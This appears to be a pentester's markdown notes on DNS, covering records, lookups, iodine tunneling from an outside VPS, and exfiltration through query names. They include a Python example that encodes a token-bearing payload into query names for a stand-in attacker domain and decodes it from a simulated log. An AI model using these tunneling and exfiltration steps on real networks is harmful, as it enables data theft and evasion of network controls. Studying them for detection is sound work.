# DNS

* [Root Servers](https://www.iana.org/domains/root/servers)
* [Zones](https://www.cloudflare.com/learning/dns/glossary/dns-zone/)
* [Records](https://www.cloudflare.com/learning/dns/dns-records/)

## Tunneling

* [Tunnel IPv4 data through DNS](https://github.com/yarrick/iodine.git)
* Start the server on a DNS server outside the target network (e.g. a VPS you control). `-b 47110` forwards queries that are not for the tunnel domain to a real DNS server listening on `localhost:47110`:
  ```sh
  iodined -b 47110 -f 10.0.0.1 tunnel.test.com
  ```
* Start the client via
  ```sh
  iodine -f -r tunnel.test.com
  ```
* The owned domain must delegate the subdomain (e.g. `tunnel.test.com`) with an `NS` record, and the name that record points to needs an `A` record with the server's public IP
* The client gets a tunnel IP in the server's tunnel subnet (`10.0.0.0/27` unless another netmask is given), e.g. `10.0.0.2`
* Check the connection via
  ```sh
  ping 10.0.0.1
  ```
* Generate an SSH key and put the public key on the server
* Dynamic port forwarding to the server through the tunnel:
  ```sh
  ssh <user>@10.0.0.1 -D 8080
  ```
* Point the client's web browser at the SOCKS proxy, e.g. Chromium's `--proxy-server="socks5://127.0.0.1:8080"`, or use a proxy switcher like FoxyProxy

## nslookup

```sh
nslookup -type=txt <domain>
```

## Reverse lookup

* Stored inside a `PTR` record
* The reverse name is the IP with its octets reversed under `in-addr.arpa.`, e.g. `4.3.2.1.in-addr.arpa.` for `1.2.3.4`; with `drill` or `dig` the plain IP is passed instead:
  ```sh
  drill -x <ip>
  dig -x <ip> +short
  ```

## Exfiltration

* Put the data into the query names of UDP DNS requests
* Capture the traffic on an owned (authoritative) DNS server for the domain
* `253` characters is the max length of a DNS name, and `63` the max length of a single label, so the payload must be chunked across several queries
* Encode the payload (e.g. hex or Base32, which survive resolvers folding case) to hide it and keep it within the allowed characters

## Infiltration

* Serve the data inside `TXT` or any other suitable record and fetch it with ordinary lookups
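The following is an added example (not code from the original notes or from iodine) showing the Exfiltration and Infiltration steps end to end: a payload is chunked into Base32 query names that respect the 63-character label and 253-character name limits, reassembled from the names an authoritative server would log (including retries, reordering, unrelated queries and case-folded names), and packed into the 255-byte strings of a `TXT` record. The domain `tunnel.test.com`, the sample payload and the "captured" query log are all constructed for the example.

```python
"""Added example: DNS exfiltration via query names and infiltration via TXT.
All names, payloads and the captured query log below are constructed."""
import base64
import random
import re
from typing import Dict, List, Optional

MAX_NAME = 253   # RFC 1035: maximum length of a full domain name
MAX_LABEL = 63   # RFC 1035: maximum length of one label
MAX_TXT = 255    # RFC 1035: maximum length of one TXT <character-string>


def _b32(data: bytes) -> str:
    # Base32 is case-insensitive, so it survives resolvers that fold or
    # randomise case (0x20 encoding); padding is stripped and restored on decode.
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def _unb32(text: str) -> bytes:
    text = text.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def encode_queries(payload: bytes, domain: str, chunk_size: int = 30) -> List[str]:
    """Split payload into numbered chunks; each becomes one query name of the form
    <seq>-<total>.<base32 labels>.<domain>, enforcing the 63/253 limits."""
    total = max(1, (len(payload) + chunk_size - 1) // chunk_size)
    names = []
    for seq in range(total):
        text = _b32(payload[seq * chunk_size:(seq + 1) * chunk_size])
        labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
        name = ".".join([f"{seq}-{total}", *labels, domain])
        if len(name) > MAX_NAME:
            raise ValueError(f"chunk {seq} gives a {len(name)}-char name; lower chunk_size")
        names.append(name)
    return names


def decode_queries(seen: List[str], domain: str) -> Optional[bytes]:
    """Reassemble the payload from query names logged at the owned server.
    Tolerates duplicates (client retries), reordering, case folding and
    unrelated traffic; returns None while chunks are still missing."""
    suffix = "." + domain.lower()
    chunks: Dict[int, bytes] = {}
    total = None
    for name in seen:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue                      # not for our domain
        head = name[:-len(suffix)]
        seq_label, _, data = head.partition(".")
        m = re.fullmatch(r"(\d+)-(\d+)", seq_label)
        if not m:
            continue                      # ordinary query under our domain
        seq, n = int(m.group(1)), int(m.group(2))
        if total is None:
            total = n
        elif n != total:
            continue                      # belongs to a different transfer
        chunks[seq] = _unb32(data.replace(".", ""))
    if total is None or len(chunks) != total:
        return None
    return b"".join(chunks[i] for i in range(total))


def to_txt_strings(data: bytes) -> List[str]:
    """Infiltration: pack data into the <=255-byte character-strings of one TXT record."""
    text = base64.b64encode(data).decode("ascii")
    return [text[i:i + MAX_TXT] for i in range(0, len(text), MAX_TXT)]


def from_txt_strings(strings: List[str]) -> bytes:
    return base64.b64decode("".join(strings))


if __name__ == "__main__":
    DOMAIN = "tunnel.test.com"                      # assumed attacker-controlled
    secret = b"user=alice;token=" + bytes(range(40))  # constructed payload
    queries = encode_queries(secret, DOMAIN)
    # Simulated server-side log: one retry with 0x20 case, plus unrelated queries.
    log = queries + [queries[0].upper(), "www.test.com", "mail.tunnel.test.com"]
    random.shuffle(log)
    assert decode_queries(log, DOMAIN) == secret
    print(f"{len(queries)} queries, longest {max(map(len, queries))} chars; recovered OK")
    print(to_txt_strings(b"config: beacon=60s"))
```

A real client would send each name as an `A` or `TXT` query to a resolver that forwards it to the authoritative server; a defender watching for this looks for many long, high-entropy subdomains under one domain with a high ratio of NXDOMAIN or short-TTL answers.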